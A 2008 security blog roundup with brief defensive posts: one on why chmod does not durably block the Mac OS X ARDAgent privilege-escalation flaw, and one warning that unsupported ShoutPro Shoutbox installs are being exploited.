  • Quark’s

I’ve stuck around for DEFCON a couple times in the past, but I don’t anymore. I fly out Friday morning or early afternoon so I get home in time to spend the weekend with the family. Personally, three days in Vegas is plenty for me.

When it gets closer to BlackHat time, I’ll post my picks from the briefings schedule.

Don’t Use chmod To Block Mac OS X ARDAgent Vulnerability [securosis.com]

Posted: 26 Jun 2008 11:02 AM CDT

Just a quick note- if you used chmod to change the permissions of ARDAgent to block the privilege escalation vulnerability being used by the new trojans you should still go compress or remove it. Repairing permissions restores ARDAgent and opens the vulnerability again.

I suppose you could also make sure you don’t repair permissions, but it’s easiest to just remove it.

I removed the chmod recommendation from the TidBITS article.

Be careful if you're running a ShoutPro Shoutbox... [Vitalsecurity.org - A Revolution is the Solution]

Posted: 26 Jun 2008 10:45 AM CDT

There seems to be a number of sites being hit with exploits related to them running ShoutPro Shoutbox. There's an old exploit related to it from 2007, but at this point we're not sure if the bad guys are using that or something new. Could be a bunch of script kiddies who saw the old exploit and decided to run wild, but what we're seeing going on now doesn't really seem to tie in much with the old exploit so who knows. As the app isn't supported anymore, it seems crazy to have it out there and still available to download and run when there's apparently a way for scumbags to mess with it.

Anybody know if the exploit linked to was ever addressed and / or fixed by the people who made ShoutPro? If it was, I guess it looks like we have a new problem on our hands. My advice? Ditch the shoutbox now to be on the safe side, unless you want phish pages, exes and God knows what else running off your server.

No comments: